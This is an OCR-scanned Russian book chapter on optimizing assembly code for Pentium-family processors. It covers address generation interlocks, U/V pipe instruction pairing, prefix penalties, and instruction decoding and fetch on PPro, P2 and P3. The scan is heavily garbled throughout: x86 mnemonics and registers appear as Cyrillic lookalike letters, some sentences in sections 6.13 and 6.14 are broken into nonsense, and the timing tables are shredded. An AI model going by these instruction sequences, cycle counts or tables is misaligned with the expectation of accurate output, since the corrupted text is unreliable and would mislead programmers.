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Если в цикле очень много переходов и вызовов, результат — потери из-за регулярны 
ошибок предсказания переходов. 

Как уже отмечалось, дополнительной потерей производительности станет периодич 
ское обращение к структурам данных, которые слишком велики для кэша данных. 


6.9. Задержка генерации адреса 


Чтобы вычислить адрес в памяти, который нужен инструкции, требуется один такт. Обыч 
но это осуществляется одновременно с выполнением предыдущей инструкции или спаренны 
инструкций. Но если адрес зависит от результата инструкции, которая выполнялась в преды 
дущем такте, приходится ждать дополнительный такт, чтобы получить требуемый адрес. Эт 
называется задержкой генерации адреса АС] (АЧагезз зепеганоп ние осК). 


АБО ЕВХ,4 / МОУ ЕАХ, [ЕВХ] ; задержка АСТ 


Задержки в данном примере можно избежать, оместив какие-нибудь другие инструк 
ции между 'АРР ЕВХ, 4' и 'МОУ ЕАХ, [ЕВХ]' или переписав код следующим образом: 


МОУ БАХ, [ЕВХ+4] / АРО ЕВХ, 4 


Также можно получить задержку АС] при использовании инструкций, которые ис 
пользуют ЕЗР для адресации, например, РОЗН, РОР, САМ, и ВЕТ, если ЕЗР был имене 
в предыдущем такте такими инструкциями, как МОУ, АРО и ЗОВ. У Р] и РММХ ест 
специальная схема, чтобы предсказывать значение ЕЗР после стековой операции, поэтс 
му в данном случае не будет задержки АС] при изменении ЕЗР с помощью РОЗН, РО 
или САМ. При использовании ВЕТ это может случиться, только если у него есть числс 
вой операнд, который прибавляется к ЕЗР. 


АБР Е5Р,4 / РОР ЕЗТ 
РОР ЕАХ / РОР ЕЗТ ; нет задержки, спариваются 
МОУ ЕЗР,ЕВР / ВЕТ ; задержка АСТ 
САБЬ Ь1 / №1: МОУ ЕАХ, [ЕЗР+8] ; нет задержки 
ВЕТ / РОР ЕАХ ; нет задержки 
ВЕТ 8 / РОР ЕАХ ; задержка АСТ 


; задержка АС! 


Инструкция ГЕА также может стать причиной задержки АСТ, если она используе 
базовый или индексный регистр, который был изменен в предыдущем такте: 


1МС ЕЗТ / ЪТЕА БАХ, [ЕВХ+А*ЕЗТ} ; задержка АС! 


У РРго, Р2 и Р3 нет задержки АС] при чтении из памяти и Г.ЕА, но есть задержка пр 


записи в память. Это не очень важно, если только последующий код не должен ждат 
пока операция записи не будет выполнена. 
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6.10. Спаривание целочисленных инструкций 


(РТ и РММХ) 
6.10.1. Совершенное спаривание 


УР! иРММХ есть два конвейера, выполняющих инструкции, которые соответствен- 
но называются О-конвейер и У-конвейер. В определенных условиях можно выполнить 


две инструкции одновременно, одну в О-конвейере, а другую в У-конвейере. Это прак- 
тически удваивает скорость. 


6.10.1.1. Имеет смысл перегруппировать инструкции для их выполнения условий спа- 
ривания. 


Следующие инструкции могут выполняться на любом конвейере: 


Ш МОУ регистр или память, непосредственный числовой операнд; 

и РОЗН регистр или число, РОР регистр [БА, МОР; 

ш ПМС, РЕС, АОБ, ЗОВ, СМР, АМ, ОВ, ХОВ и некоторые разновидности ТЕ$Т (см. 
разд. 6.26.14). 


Следующие инструкции спариваемы с другими в случае выполнения только на 
О-конвейере: 


м ЛОС, 5ВВ $НБВ, ЗАК, ЭНГ, ЗАТ. с числом в качестве аргумента; 
в КОК, КОГ, ВСВ, ВСУ. с единицей в качестве аргумента. 
Следующие инструкции спариваемы только в У-конвейере: 


# ближний вызовой; 


ре: 


короткий и ближний переход; 
# короткий и ближний условный переход. 


Все другие целочисленные инструкции могут выполняться только в О-конвейере и не 
могут спариваться. 


6.10.1.2. Две следующие друг за другом инструкции будут спариваться, если соблю- 
деные следующие условия: 


И первая инструкция спариваема в Ч-конвейере, а вторая — в У-конвейере; 
Ш вторая инструкция не читает и не пишет из регистра, если пишет первая инструкция. 


Примеры 
МОУ ЕАХ, ЕВХ / МОУ ЕСХ, ЕАХ ; чтение после записи, не спаривается 
МОУ ЕАХ, 1 / МОУ ЕАХ, 2 ; запись после записи, не спаривается 
МОУ ЕВХ, ЕАХ / МОУ ЕАХ, 2 ; запись после чтения, спаривается 





Глава 6. Оптимизация для процессоров семебства РепНит 369 


МОУ ЕВХ, ЕАХ / МОУ ЕСХ, ЕАХ ; чтение после чтения, спаривается 
МОУ ЕВХ, ЕАХ / 1М№С ЕАХ ; чтение и запись после чтения, спаривается 
6.10.1.3. Неполные регистры считаются полными регистрами. 
МОУ АБ, ВЬ / МОУ АН, 0 
пишут в разные части одного и того же регистра, не спаривается. 


6.10.1.4. Две инструкции, пишущие в разные части регистра флагов, могут спаривать- 
ся, несмотря на правила 6.10.1.2 и 6.10.1.3. 
ЗН ЕАХ, 4 / Т1МС ЕВХ ; спаривается 


6.10.1.5. Инструкция, которая пишет в регистр флагов, может снариваться 
с условным переходом, несмотря на правило 2. 


СМР ЕАХ, 2 / ЗА Тае1В19дег ; спаривается 


6.10.1.6. Следующая комбинация инструкций может спариваться, несмотря на тот 
факт, что обе изменяют указатель на стек: 


РОЗН + РОЗН, РОЗН + САБЫ, РОР + РОР 


6.10.1.7. Есть ограничения на спаривание инструкций с префиксами. Есть несколько 
типов префиксов: 


и у инструкций, обращающихся к сегменту, не являющемуся сегментом по умолчанию, 
есть сегментный префикс; 


№ у инструкций, использующих 16-битные данные в 32-ом режиме или 32-битные дан- 
ные в 16-битном режиме, есть префикс размера операнда; 


в у инструкций, использующих 32-битную адресацию через регистры в 16-ти битном 
режиме, есть префикс размера адреса; 

® уповторяющихся есть префикс повторения; 

у закрытых инструкций есть префикс ГОСК; 

® умногих инструкций, которых не было на пропессоре 8086, есть двухбайтный опкод, 
чей пёрвый байт равен ОЕН. Байт ОЕН считается префиксом только на Р1. Наиболее 
часто используемые инструкции сэтим префиксом следующие: МОУ7Х, МОУ5Х, 
РОЗН Е$, РОР Е$, РИЗН ©$, РОР 0$, Г.ЕЗ, 145$, 155, ЗЕТсс, ВТ, ВТС, ВТК, ВТФ, 
ВЕ, ВУВ, ЗНЕО, ЗНВО и 1МОЕ, с двумя операндами и без числового операнда. 


На Р|1 инструкция с префиксом может выполняться только в О-конвейере, кроме 
ближних условных переходов. ` 

На РММХ инструкции с префиксами размера операнда, размера адреса или ОЕН мо- 
Гут выполняться в любом конвейере, в то время как инструкции с префиксами сегмента, 
повторения или ГОСК могут выполняться только в О-конвейере. 
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6.10.1.8. Инструкция, в которой используется одновременно адресация со смещенг.. 
и числовые данные на Р1 не спариваются, на РММХ могут спариваться только в О-конвейе; _ 


МОУ БНОВР РТВ 05$: [1000], 0 ; не спаривается или только в О-конвейете 
СМР ВУТЕ РТВ [ЕВХ+8], 1 ; не спаривается или только в б-конвейете 
СМР ВУТЕ РТВ [ЕВХ], 1 ; спаривается 
СМР ВУТЕ РТК [ЕВХ+8], АЬ ; спаривается 


Другая проблема, связанная с подобными инструкциями, выполняющимися на 
Р\"МХ, заключается в том, что такие инструкции могут быть длинее семи байтов, а это 
приводит к невозможности раскодировки больше одной инструкции за такт, подробнее 
это объясняется в разд. 6.12. 


6.10.1.9. Обе инструкции должны быть заранее загружены и раскодированы. Это объ- 
ясняется в разд. 6.8. 


6.10.1.10. Есть специальные правила спаривания для инструкций ММХ на РММХ: 


ш ММхХ-сдвиг, инструкции упаковки или распаковки могут выполняться в любом кон- 
вейере, но не могут спариваться с другим ММХ-сдвигом, инструкциями упаковки или 
распаковки; 

и ММхХ-инструкции умножения могут выполняться в любом конвейер, но не мотут 
спариваться с другими ММХ-инструкциями умножения. Они занимают 3 такта, 
и последние 2 такта могут перекрыть последующие инструкции так же, как это 
делают инструкции плавающей запятой (см. гл. 24}; 

ш ММХ-инструкция, обращающаяся к памяти или целочисленным регистрам, может 
выполняться только в О-конвейер и не может спариваться с не-ММХ инструкцией. 


6.10.2 Несовершенное спаривание 


Бывают ситуации, когда две спариваюшщиеся инструкции не будут выполняться одновре 
менно или будут частично рассинхронизированы во времени. Пока обе инструкции не выпол 
няться (каждая на своем конвейере), ни одна другая инструкция не начнет выполняться. 

Несовершенное спаривание возникает в следующих случаях. 


6.10.2.1. Если вторая инструкция приводит к задержке АСО (разд. 6.9). 


6.10.2.2. Две инструкции не могут обращаться к одному и тому двойному слову в памя- 
ти одновременно. 


МОУ Аь, [ЕЗ!Т] / МОУ ВЬ, [Е51+1] 


Два операнда команд находятся внутри одного и того же двойного слова, поэтому 
они не могут выполняться одновременно. Пара займет два такта для выполнения. 
МОУ АБ, [ЕЗ1+3] / МОУ ВЬ, [Е$1+4] 











к 
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„.. 


Эти два операнда находятся в разных двойных словах, поэтому они прекрасно спари- 
ваются и занимают всего один такт. 


6.10.2.3. Правило 6.10.2.2 расширяет зону своего действия, если биты 2 -— 4 обоих 
адресов одинаковы (конфликт банков кэша). Для адресов размером в двойное слово это 
означает, что разность между обоими адресами не должна делиться на 32. 


МОУ [Е51], ЕАХ / МОУ [Е51+32000], ЕВХ ; несовершенное спаривание 


МОУ [ЕЗТ], ЕАХ / МОУ [Е51+32004], ЕВХ ; совершенное спаривание 


Спариваемые целочисленные инструкции, которые не обращаются к памяти, требуют 
один такт для выполнения, кроме неправильно предсказанных переходов. Инструкции 
МОУ, читающие или пишушие в память также занимают один такт, если данные нахо- 
дятся в кэше и правильно выравненны. Нет потери в скорости при использовании слож- 
ных способов адресации, таких, как смещение и масштабирование. 

Спариваемая целочисленная инструкция, которая читает из памяти, делает какие-то 
вычисления, а затем сохраняет результат в регистрах или флагах, занимает 2 такта (инст- 
рукции чтения/модифицирования). 

Спариваемая пелочисленная инструкция, которая читает из памяти, делает какие-то 
вычисления, а затем записывает результат обратно в память, занимает 3 такта (инструк- 
ции чтения/модифицирования/записи). 


6.10.2.4. Если инструкция чтения/модифицирования/записи спаривается с инструкцией чте- 
ния/модифицирования или чтения/модифицирования/записи, тогда они спарятся неидеально. 


Количество тактов, которые потребуются для выполнения такой пары, даны в табл. 6.4. 


Табл. 6.4. Время выполнения некоторых спаренных целочисленных инструкций 
Первая инструкция 













Вторая инструкция 


МОУ или чтение/изменение 
регистр 





чтение/изменение/запись 








МО\ или регистр 
чтение/изменение 
чтение/изменение/запись 


АРБ [пеп1], ЕАХ / АБР ЕВХ, [пеп2] 


; 4 такта 
АРО ЕВХ, [пеп2] / АБО [пеп1], БАХ ; 3 такта 


6.10.2.5. Когда две спаривающиеся инструкции требуют дополнительное время для 
выполнения из-за неоптимального использования кэша, невыровненности или непра- 
вильно предсказанного условного перехода, они будут выполняться дольше, чем каждая 
Инструкция по отдельности, но меныше суммы времен, требующихся на выполнение 
каждой из них по отдельности. 
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6.10.2.6. Спариваемая инструкция с плавающей запятой и следующая за ней ЕХСн 
повлекут несовершенное спаривание, если последняя не является инструкцией с пла. 
вающей запятой. 


Чтобы избежать несовершенного спаривания, нужно знать, какие инструкции пойдут 
в 0-конвейер, а какие — в У-конвейер. Это можно выяснить, просмотрев код и отыскав 
инструкции, которые неспрариваются, или спариваются только в определенном конвейе. 
ре, или не могут спариваться в силу одного из вышеизложенных правил. 

Несовершенного спаривания можно зачастую избежать, реорганизовав свои инструкции. 


Ь1: МОУ ЕАХ, [ЕТ] 
МОУ ЕВХ, [Е5Г] 
ТЫС ЕСХ 


Здесь две инструкции МОУ формируют несовершенную пару, потому что обе обра 
щаются к одной и той же области в памяти, поэтому последовательность займет 3 такта 
Можно улучшить этот код, реорганизовав инструкции так, чтобы ПМС ЕСХ' спаривалас 
с одной из инструкции МОУ. 


ь2: МОУ БАХ, ОРРЗЕТ А 
ХОВ ЕВХ,ЕВХ 
ТС ЕВХ 
МОУ ЕСХ, [ЕАХ] 
9МР 1 


Пара МС ЕВХ / МОУ ЕСХ,[ЕАХ] несовершенная, потому что следующая инструк- 
ция приводит к задержке АСТ. Последовательность занимает 4 такта. Если вставить МОР 
или какую-нибудь другую инструкцию, чтобы 'МОУ ЕСХ[ЕАХ]' спаривался с ')МР 11°. 
последовательность займет только три такта. 

Следующий пример выполняется в 16-битном режиме, предполагается, что 5Р делит: 
ся на 4: 


ЬЗ: РОЗН АХ 
РОЗН ВХ 
РУЗН сх 
РУЗН ЭХ 
САТЬ РОМС 


Инструкции РОЗН формируют две несовершенные пары, потому что оба операнла 
в каждой паре’ обращаются к одному и тому же слову в памяти. 'РИЗН ВХ' могла бы 
совершенно спариться с РОЗН СХ (потому что они находятся по разные стороны от гра" 
ницы, отделяющей двойные слова друг от друга), но этого не происходит, потому чТ0 
она уже спарена с РИЗН АХ. Поэтому последовательность занимает 5 тактов. Если вст" 
вить МОР или другую инструкцию, чтобы "РОЗН ВХ' спаривалась с "РОЗН СХ', а "РОЗН 
ОхХ' с 'САШМ, ЕОМС', последовательность займет только 3 такта. Другой путь разрешения 
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данной проблемы — убедиться, что $Р не кратен четырем. Правда, узнать это в 16-битном 
режиме довольно сложно, поэтому лучший выход — использовать 32-битный режим. 


6.11. Разбивка сложных инструкций на простые 
(Р1и РММХ) 


Вы можете разбить инструкции чтения/модификации и инструкции чте- 
ния/модификации/записи, чтобы улучшить спаривание. 


АБР [пеш] },ЕАХ / АРР [пеш2},ЕВХ '; 5 тактов 


Этот код можно разбить на следующую последовательность, которая будет занимать 
только 3 такта: 


МОУ ЕСХ, [пеп11 / МОУ ЕОХ, [пеп2] / АРО ЕСХ,ЕАХ / АБО БОХ, ЕВХ 
МОУ [пеп1},ЕСХ / МОУ [пеп2],ЕБХ 


Таким же образом можно разбивать неспариваемые инструкции на спариваемые: 


РОЗН [пмеп]1 
РОЗН [пеп2] ; не спаривается 


разбивается на: 


МОУ ЕАХ, [пеп1 ] 
МОУ ЕВХ, [пеп2 ] 
РОЗН ВАХ 


РОЗН ЕВХ ; все спаривается 


Другие примеры неспариваемых инструкпий, которые можно разбить на простые 
спариваемые: 


СРО разбивается на МОУ ЕБХ,ЕАХ / ЗАВ ЕРХ, 31 

МОТ БАХ меняется на ХОВ ЕАХ, -1 

МЕС БАХ разбивается на ХОВ ЕАХ,-1 / ТМС РАХ 

"МОУ2Х ЕАХ, ВУТЕ РТВ [шеп] разбивается на ХОВ ЕАХ,ЕАХ / МОУ АГ,ВУТЕ РТВ [пец] 
УЕСХ? разбивается на ТЕЗТ ЕСХ,ЕСХ / 17 

100Р разбивается на РЕС ЕСХ / 37 

ХЬАТ меняется на МОУ АЪ, [ЕВХ+ЕАХ ] 


. Если разбивание иснтрукций не повышает скорось, можно оставить сложные или не- 
париваемые конструкции для уменьшения размера кода. о 
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6.12. Префиксы (Р1 и РММХ) 


Инструкция с одним или более префиксами не может исполняться в \У-конвейерь 
(смотри секцию 6.10.1.7). 

На Р| возникает задержка в один такт для каждого префикса, кроме ОЕН 
в инструкциях условного ближнего перехода. 

У РММХ нет задержки раскодирования из-за префикса ОЕН. Префиксы сегментов 
и повторения занимают один такт для раскодирования. РММХ может раскодировать, 
две инструкции, если у первой инструкции нет префиксов или есть префикс сегмента 
или повторения, у второй инструкции нет префиксов. Инструкции с префиксами раз- 
мера адреса или операнда на РММХ раскодировываются только отдельно. Инструкции 
с несколькими префиксами занимают по одному такту на каждый префикс. 

Префиксы размера адреса нужно избегать, используя 32-битный режим. Префиксы 
сегментов можно избежать в 32-битном режиме, используя особенности плоской модели 
памяти. Использования префикса размера операнда можно избежать в 32-битном режи- 
ме, используя только 8-битные и 32-битные данные. 

Когда нельзя избежать префиксов, задержку раскодирования можно скрыть, если 
предыдущая инструкция занимает больше одного такта для исполнения. Правило для Р1: 
каждая инструкция, которая занимает М тактов для выполнения (не для раскодирования), 
может ‘затенять’ задержку раскодирования №-1 префиксов в следующих двух (иногда 
трех) инструкциях или парах инструкций. Другими словами, каждый дополнительный 
такт, который требует инструкция для выполнения, может быть использован для раско- 
дирования одного префикса в следующей инструкции. Этот эффект иногда распростра- 
няется даже на правильно предсказанный переход. Любая инструкция, которая занимает 
больше одного такта для выполнения, и любая инструкция, чье выполнение задержива- 
ется из-за АСТ, неправильного использования кэша, неправильного выравнивания или 
неправильного предсказания перехода, создает эффект ‘затемнения’. 

У РММХ есть похожий эффект 'затемнения', но он имеет другой механизм. Расколи- 
ровываемые инструкции хранятся в прозрачном буфере ЕКО, в котором может хранить" 
ся до четрырех инструкций. Когда буфер пуст, инструкции выполняются сразу после 
раскодировки. Буфер заполняется, когда инструкции раскодировываются быстрее, чем 
выполняются, т. е. они неспарены или являются мультитактовыми. Буфер НЕО опусто- 
шается, когда инструкции выполняются быстрее, чем раскодировываются, т. е. когда 
возникают задержки из-за префиксов. Буфер ЕКО становится пустым после неправильно 
предсказанного перехода. Буфер ЕЕО может получить две инструкции за такт, если 
у второй инструкции нет префиксов и ни одна из инструкций не длинее 7 байт. Два кон" 
вейера (0 и У) могуть получать по одной инструкции за такт из буфера ЕТО. 


СЬЬ / ВЕР МОУ$Ь 
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Инструкция СЕР занимает два такта и поэтому затемняет задержку раскодировки 


префикса ВЕР. Код занял бы на один такт больше, если бы инструкция СТО находилась 
достаточно далеко от КЕР МОУЗО. 


СМР ОНОВР РТВ [ЕВХ]},0 / МОУ ЕАХ,0 / ЗЕТМА АЪ 


Инструкция СМР занимает два такта, потому что это инструкция чте- 
ния/модифипирования. Префикс ОЕН инструкции ЗЕТМИ, раскодировывается во время 
второго такта выполнения СМР, поэтому задержка раскодирования скрыта на Р1 
(УРММХ нет задержки для ОЕН). 


Потери производительности, связанные с префиксами, на РРго, Р2. и РЗ объясняются 
в ГЛ. 6. 1 4. 


6.13. Обзор конвейеров РРго, Р2 и РЗ 


Архитектура микропроцессоров РРго, Р2 и РЗ хорошо объяснена и проиллюстриро- 
вана в различных руководствах ие]. Желательно для продолжения разговора начать 
с изучения именно этих материалов. Ниже коротко осбуждаются архитектурные особен- 
ности микропроцессоров семейства Репйит с упором на те элементы, которые необхо- 
димы для оптимизации кода. 

Итак, код доставляется из кэша кода выровненными 16-байтными последовательно- 
стями в "удвоенный" буфер, в который умещаются две таких последовательности. Затем 
из него код поступает в декодеры в виде блоков, размером 16 байт, не обязательно 
выровненных на границу инструкции. Цель удвоенного буфера — сделать возможным 
раскодировку инструкций, которые пересекают границу в 16 байт. 

Каждый 16-байтный блок анализируется декодером длины инструкции, который оп- 
ределяет границы смежных инструкций, а затем каждая из инструкций попадает в один 
из декодеров инструкций. В микропроцессорах семейства Репит есть три декодера, 
иэто дает возможность декодировать до трех инструкций за такт. Группа из трех инст- 
рукций, декодируемых за один такт, называется декодируемой группой. 

Декодеры переводят инструкции в микрооперации (сокрашенно "мопы"). Простые 
инструкции генерируют только один моп, в то время как более сложные инструкции 
могут генерировать несколько мопов. Например, инструкция 'АРО ЕАХ,[МЕМ] ' декоди- 
руется в два мопа: один, считывающий исходный операнд из памяти, а другой, который 
выполняет сложение. Целью разбития инструкций на мопы является сделать обработку 
инструкций более эффективной и поддающейся конвейеризации. 

Три декодера называются, соответственно, 20, 21 ир2. 20 может обрабатывать лю- 


бые инструкции, в то время как ОТ и 22 могут обрабатывать только простые инструк- 
ии, генерирующие только один моп. ` 
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Мопы из декодеров через короткую очередь поступают в таблицу распределения ре 
гистров (ВАТ). Выполнение мопов осуществляется на временных к т сле чего 
результат записывается в постоянные регистры ЕАХ, ЕВХ ит. д. с ы тоя 
указание мопам, какие временные регистры использовать и позволи р ие 

иже). 
РР" ППовле Ат р поступают в буфер перегруппировки (КОВ). Целью КОВ не 
упорядоченное выполнение. Мопы остаются в области станции резервирования ый та Юп 
заНоп), пока не станут доступны операнды, которые им необходимы. | о от ра лля 
мопа задерживается из-за того, что генерирующий его предыдущий м и 
свою работу, тогда КОВ может найти дургой моп в очереди, чтобы сэк ыы а в 

Готовые к выполнению мопы посылаются в модули исполнения ({ехеси ‚к 
рые сгруппированы вокруг пяти портов: порт О и 1 могут обрабатывать все прифм вы 
ские операции, переходы и т. д. Порт 2 берет на себя операции счит ‚ пор 
3 высчитывает адреса для записи в память, а порт 4 выполняет эту запись. И 

После того как инструкция была выполнена, она помечается в КОВ как готова кул 
лению, после чего поступает в область удаления (гейгетей! $аНоп). Здесь © р 
временных регистров, использованных мопами, записывается в пос он „регистры. 
Хотя мопы могут запускаться не по порядку, последний из них долже 


лен при удалении. 


6.14. Раскодировка инструкций (РРго, Р2 и РЗ) 


Раздел 6.13 необходим для получения представления о работе раскодировщиков опе- 
раций и понимания возможных способов доставки к ним инструкций. ли соблюдены 
Декодеры могут обрабатывать три инструкпии за такт, но только ‹ цию 
определенные условия. Декодер и может о брибаыват оу ине р 
гене ет до 4 мопов. Декодеры и 
уши, торые тенерируют 1 мой и эти инструкции не могут занимать олье Вот 
Резюмируем правила для декодирования двух или трех инструкций з . 


первая инструкци (20) не должна генерировать больше 4-мопов; имо 
вторая и третья инструкции не должны генерировать больше, чем по одно у ; 
вторая и третья инструкции не могут занимать больше 8-байтов катал; 15 
инструкции должны содержаться внутри одного 16-байтного (см. разд. 6.15). 


и 
й се ТР 
На длину инструкции в 00 не накладывается никаких ограничений, пока в 
инструкции помещаются в одном 16-байтном блоке. больше такта 27 

Инструкция, которая генерирует больше 4 мопов, требует два или ао 
раскодировки, и никакая другая инструкция не может раскодировываться пр 
параллельно. | 
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вене Фон и нова и о ооо нии нон к 2 о обор робони ии зооз оон но зи ини зоо нина вонвавиново 


Из вышеприведенных правил следует, что декодеры могут генерировать максимум ше 
мопов за такт, если первая инструкция в каждой раскодировываемой группе разбивается на 
мопа, а другие две — на один каждая. Минимальное количество — это два мопа за такт, ес 
все инструкции генерируют го два мопа, так что 21 и 2 никогда не используются. | 

Для максимальной производительности рекомендуется перегруппировать инструкци 
оптимизируемой программы в блоки 4-1-1: инструкции, которые генерирует 2 или 4 мог 
можно разбить на две простые одномопные инструкции, что не будет стоить ни такта: 


МОУ ЕВХ, (МЕМ1}] 1 пор (00) 
ТМС ЕВХ ; 1 пор (01) 
АБО ЕАХ, [МЕМ2] ; 2 порз (00) 
АБО [МЕМЗ], ЕАХ ; 4 порз (100) 


Эта последовательность инструкций занимает три такта для раскодировки. Можн 
сэкономить один такт, перегруппировав инструкции в две декодируемые группы: 


АБО ЕАХ, (МЕМ2] ; 2 порз (10) 
МОУ ЕВХ, [МЕМ1] ; 1 пор (01) 
ТАС ‚ ЕВХ 1 пор (02) 
АБР [МЕМЗ], ЕАХ ; 4 порз (00) 


Теперь декодеры генерируют 8 мопов за два такта, что удовлетворительно. На боле 
поздних стадиях конвейер может обрабатывать только 3 мопа за такт, поэтому при ск 
рости декодирования высшей, чем эта, можно считать, что декодирование не являетс 
узким местом. Тем не менее, сложности в механизме доставки могут задерживать раск 
дирование (см. разд. 6.15), поэтому следует стремиться к достижению скорости раскоди 
ровки, превышающей 3 мопа за такт. 

Вы можете узнать количество генерируемых инструкцией мопов из таблицы разд. 6.29. 


Префиксы инструкций также приводят к потере скорости раскодировки. У инстру! 
ций могут быть префиксы следующих видов. 


и Префикс размера операнда требуется, когда вы используете 16-битный операн 
в 32-х битном окружении или наоборот. (Не считая инструкций, у которых опера 
ды могут быть только одного размера, например ЕМ5Т$\ АХ). Префикс размер 
операнда вызывает потерю нескольких тактов, если у инструкции есть числовой 14 
или 32-битный операнд, потому что. размер операнда меняется префиксом. 


АБЬ Вх, 9 } без потерь, так как операнд 8-битовый 
МОУ НОВр РТВ [МЕМ16], 9 ; есть потери, так как операнд 16-ти битовый 


А0р ВХ, 9 }; без потерь, так как операнд 8-битовый 
МОУ ИОВР РТВ [МЕМ16], $ ; есть потери, так как операнд 16-ти битовый 


Последную инструкцию следует заменить на 
МОУ ЕАХ, 9 
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МОУ ИОВО РТВ [МЕМ1Т6], АХ ; никаких потерь, 
; т.к. операция не требует немедленного Исполнени, 
МОУ КАХ, 9 С 
МОУ ИОВР РТВ [МЕМ1 6}, АХ ; нет потерь, так как нет числовых операндсв 


ш Префикс размера адреса используется при 32-битной адресации в 16-битном режиме или 
наоборот. Это редко требуется и этого следует избегать. Префикс размера адреса вызывае: 
потери каждый раз, когда операнды используются явно, потому что их интерпретация 
изменяется с помощью префикса. Инструкции, оперирующие памятью неявно (например. 
строковые операции), не приводят к потерям, связанных с префиксом размера операнда. 

м Префиксы сегментов используются, когда вы обращаетесь к данным, находящимся не в се 
менте данных по умолчанию. На РРго, Р2 и РЗ префиксы сегментов не приводят к потерям, 

ш Префиксы повторения и префиксы закрытия (1осК ргеЯхез) не приводят к потерям пр 
декодировании. 

ш Обязательно будут потери, когда в случае использования больше одного префикса 
Обычно уходит по одному такту на каждый префикс. 


6.15. Доставка инструкций (РРго, Р2 и РЗ) 


Код доставляется в двойной буфер из кэша кода последовательностями по 16 байт 
Удвоенный буфер называется так, потому что он может содержать две таких последова 
тельности (см. разд. 6.13). Затем код берется из удвоенного буфера и передается декодерам 
поблочно (в основном по 16 байтов, но иногда он может быть и не выравнен по этой гра- 
нице). Назовем такой блок блоком доставляемых инструкций БДИ. Если инструкция в БДИ 
пересекает границу в 16 байт, ее нужно изъять из обоих последовательностей удвоенного 
буфера и перегрупприровать инструкции в них. Таким образом, удвоенный буфер нужен 
для того, чтобы позволить доставку инструкций, пересекающих барьер в 16 байт. 

Удвоенный буфер может доставить одну 16-байтную последовательность за такт 
и может сгенерировать один БДИ за это же время. БДИ также могут иметь размер менее 
16 байт за счет предсказания переходов (см. разд. 6.22). 

К сожалению, удвоенный буфер недостаточно велик, чтобы обрабатывать инструкци® 
связанные с переходами без задержек. Если БДИ, который содержит инструкцию перехода, 
пересекает 16-байтную границу, двойному буферу требуется держать две последовательных 
16-байтных последовательности, чтобы сгенерировать его. Если первая инструкция после 
перехода пересекает 16-байтную границу, тогда удвоенный буфер должен загрузить две #0 
вых 16-байтных последовательности кода, прежде чем он будет генерировать БДИ. Это озн8 
чает, что в худшем случае декодирование первой инструкции после перехода может быть 
задержано на два цикла. Потери могут произойти из-за пересечения 16-байтных ГР 
вБДИ, содержащем переход. Возможно получение выигрыша в производительности, © 
имеется более одной раскодировываемой группы в БДИ, которая содержит переход, потом 
что это дает удвоенному буферу дополнительное время для доставки одной или двух после 
вательностей кода, следующих за переходом. Подобные выигрыши могут компенсировё® 
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потери согласно табл. 6.5. Если удвоенный буфер доставляет только одну 16-байтную после- 
зовательность после перехода, тогда первый БДИ после перехода будет идентичен ей, т. е. 
выравнен по 16-байтной границе. Другими словами, первый БДИ после перехода не будет 
начинаться с первой инструкции, но с ближайшего предшествующего адреса, кратного 16. 
Если У удвоенного буфера есть время, чтобы загрузить две последовательности, тогда новый 


БДИ может пересечь 16-байтную границу и начаться с первой инструкции после перехода. 
эти правила кратко прорезюмированы в следующей таблице. 


Таблица 6.5. Затраты на декодирование инструкицо в БДИ 


Количество 16-байтная 16-байтная задержка выравнивание 
декодируемых граница в этом граница в первой декодера первого БДИ 
групп в БДИ, инструкции после после перехода 
содержащем перехода 

переход 

1 на 16 

1 к инструкции 

1 на 16 

1 к инструкции 

2 к инструкции 

2 к инструкции 

2 на 16 

2 


к инструкции 
к инструкции 
к инструкции 
к инструкции 
к инструкции 
Переходы задерживают доставку, поэтому цикл всегда занимает на два такта больше 
за выполнение, чем количество 16-ти байтных границ в цикле. 
Следующая проблема с механизмом доставки инструкций заключается в том, что новый 
‚ не сгененирируется, пока предыдущий не будет полностью отработан. Каждый БДИ 
ожет содержать несколько раскодировываемых групп. Если БДИ длиной 16 байт заканчива- 
ется незавершенной инструкцией, тогда следующий БДИ начнется в начале этой инструкции. 
в инструкция в БДИ всегда попадает в 00, а следующие две инструкции направляются 
‚ если это возможно. Как следствие, 01 и 02 используются не совсем оптимально. 
ль ко структурирован согласно правилу 4-1-1, а инструкция, которая, как предполагалось, 
в пр сяв 21 или 02, оказывается первой инструкцией в БДИ, тогда она попадает 
, ведет к потере одного такта. Вероятно, это недостаток архитектуры процессора. 


Зили больше 
Зили больше 
Зили больше 
Зили больше 











Из-за этого время, которое займет раскодировка определенного кода, может зависеть от тот 
где начнется первый БДИ. 

Если скорость раскодирования инструкций критична и желательно избежать это 
проблемы, нужно знать, где начинается каждый БДИ. Это довольно нудная работа. Вн;. 
чале нужно разделить сегмент на параграфы, чтобы знать, где находятся 16-байтные гре. 
ницы. Затем нужно взглянуть на ассемблерный листинг, чтобы увидеть, какова дли, 
каждой инструкции. (Рекомендуется изучить, как кодируются инструкции, чтобы уме 
предсказывать их длину.) Если известно, где начинается один БДИ, тогда можно найт 
где начинается другой. Если он кончается на границе между инструкциями, значит, сл. 
дующий БДИ начнется здесь. Если он включает в себя часть инструкции, тогда следук 
щий БДИ начнется с этой инструкции. (Здесь нужно подсчитывать только длины инст. 
рукций, не имеет значения, сколько мопов они генерируют.) Таким образом, можно 
обработать весь код и отметить, где начинается каждый из БДИ-блоков. Единственная 
проблема — это узнать, где находится первый БДИ. Вот несколько подсказок. 


# Первый БДИ после перехода, вызова или возврата из подпрограммы может начинаться 
либо с первой, либо на ближайшей предшествующей 16-байтной границе, согласно табл. 
6.5. Если выравнять первую инструкцию так, чтобы она начиналась с 16-байтной границы, 
можно быть уверенным, что первый БДИ начнется именно с нее. Можно выравнять 
подобным образом код важных процедур и циклов, чтобы ускорить работу программы. 

в Если комбинированная длина двух последовательных инструкций больше 16 байтов. 
можно не сомневаться, что вторая из них не попадет в тот же БДИ, что и первая, слело- 
вательно, вторая инструкция будет первой в в следующем БДИ. Можно использовать ее 
в качестве стартовой точки для того, чтобы найти, где начинаются следующие БДИ. 

и Первый БДИ, после неправильного предсказания перехода, начинается на 16-байтной грани: 
це. Как объясняется в секции 6.22.2, цикл, который повторяется больше 5 раз, всегда будет 
приводить к неправильному предсказанию перехода при выходе из него. Первый БДИ посл 
такого никла будет начинаться на ближайшей предшествующей 16-байтной границе. 

# Есть также другие события, приводящие к подобному эффекту, например прерывания, 
исключения, самомодифирующийся код и такие инструкции, как СРОШ, П\ и ОЧТ. 
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Табл. 6.6. Пример расчета загрузки БДИ 



















МОУ ЕСХ, 1000 5 1 м 
1005 Ц: МОУ [ЕбТ], ЕАХ 2 2 
1007Н Мо\ [МЕМ], 0 2 
